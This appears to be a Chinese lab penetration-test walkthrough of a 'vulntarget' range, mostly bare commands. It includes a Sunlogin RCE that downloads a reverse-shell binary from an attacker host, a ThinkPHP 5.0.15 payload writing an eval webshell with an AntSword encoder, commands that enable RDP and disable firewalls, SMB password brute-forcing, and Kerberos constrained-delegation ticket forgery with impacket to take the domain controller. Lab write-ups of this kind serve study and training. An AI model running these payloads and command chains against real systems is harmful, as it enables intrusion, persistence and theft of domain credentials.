guangen2025-07-28文章来源:SecHub网络安全社区
拓扑图
全端口扫描
POC检测到漏洞CNVD-2022-03672
抓包http://10.10.10.143:49689/cgi-bin/rpc
修改请求方法POST
添加action=verify-haras字段
发包获取到session:ciiHpsOHS1UtC5ZfZMrA1gApw9htv8ph
修改参数,添加session,命令执行
工具命令执行:https://github.com/ce-automne/SunloginRCE
wget下载反向马,dir无文件
sunRce.exe -t rce -h 10.10.10.143 -p 49689 -c "wget http://10.10.10.128:888/tcp_windows_amd64.exe -O C:\Windows\system32\tcp_windows_amd64.exe"
sunRce.exe -t rce -h 10.10.10.143 -p 49689 -c "dir"
杀软查询
CS生成.c格式木马,掩日免杀生成免杀马
上传执行
查看网卡信息
10.10.10.143
192.168.100.155
抓取hash解密->win2008
开启远程,信息收集
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
windows机器判定是否存在域以及是否在域内
不存在域
开启socks5代理
fscan快速打点
没有扫描到192.168.100.1/24网段IP
shell arp -a查看局域网设备连接情况
探测到192.168.100.131
fscan快速打点
宝塔面板
结合桌面拿到的域名,制作hosts碰撞:https://github.com/pmiaowu/HostCollision
报错中徘徊,cs的socks代理貌似有点不稳定,远程登录关闭杀毒,上线vshell,也不稳定,windows一直掉线
只能手动上线
www.cJO6w10YLS.com访问到站点,修改hosts,访问http://www.cjo6w10yls.com/
外网主机火狐历史访问记录
thinkphp框架
尝试http://www.cjo6w10yls.com/vulntarget/public/?s=1显示报错,版本为V5.0.15
代码审计不擅长,直接利用官方POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=../../1.php&vars[1][1]=test123
写入shell
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=../../9.php&vars[1][1]=%3C?php%20eval(urldecode(urldecode(urldecode($_REQUEST['xx']))));?%3E
创建蚁键编码器
/**
* php::3次url
* <?php eval(urldecode(urldecode(urldecode($_REQUEST['test']))));?>
*/
'use strict';
// ########## 请在下方编写你自己的代码 ###################
function forceEncode(s) {
return Array.from(s).map(i=>'%'+i.charCodeAt(0).toString(16).padStart(2,'0')).join('')
}
module.exports = (pwd, data, ext={}) => {
const payload = data['_']
data[pwd] = forceEncode(forceEncode(payload));
delete data['_'];
console.log(data);
return data;
}
ret=127
使用脚本:https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php
home目录下含有key文件
尝试连接vulntarget,失败
连接root,显示未受保护的私钥文件,chmod +x 600
ufw disable关闭防火墙
winddows无python,传安装开启http服务
ubuntu下载运行
windows外网正向连接ubuntu
192.168.88.100
192.168.100.131
二层代理,proxifier配置代理链
发现另一台机器IP
fscan扫描,ms17-010偶尔蓝屏,优先sqlserver与smb,弱密码爆破
smb:administrator/admin@123
尝试wmiexec.py连接
附件-codec 936改变编码
windows
192.168.88.102
10.0.10.9
tasklist /SVC无杀毒
ubuntu开启http服务:
php -S 0.0.0.0:8888
powershell ( new-object System.Net.WebClient).DownloadFile( 'http://192.168.88.100:8884/tcp_windows_amd64.exe' , 'C:\Users\Administrator\s.exe' )
关闭防火墙
netsh firewall show state
netsh firewall set opmode mode=disable
成功上线vshell
systeminfo发现域
域控地址
开远程
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
win2008/qweASD123
票据
探测约束委派
AdFind.exe -h 10.0.10.10 -u win2008 -up qweASD123 -b "DC=vulntarget,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
票据申请
proxychains4 python3 /usr/share/doc/python3-impacket/examples/getST.py -dc-ip WIN-1PV25H8UJPN.vulntarget.com vulntarget.com/win2008:qweASD123 -spn cifs/WIN-1PV25H8UJPN.vulntarget.com -impersonate administrator
导入票据
export KRB5CCNAME=administrator@cifs_WIN-1PV25H8UJPN.vulntarget.com@VULNTARGET.COM.ccache
登录
proxychains4 python3 /usr/share/doc/python3-impacket/examples/smbexec.py -no-pass -k WIN-1PV25H8UJPN.vulntarget.com -codec 936
外网:向日葵漏洞,免杀马,下载运行上线cs,开远程关防火墙,上线vshell,抓密码,开代理
ubuntu:thinkphp写入shell,绕过滤,ret127绕过命令执行,泄露ssh密钥
windows域:smb弱密码,wmiexec.py连接,定位域,开远程,域信息探测
域控:申请伪造票据,导入,smbexec.py连接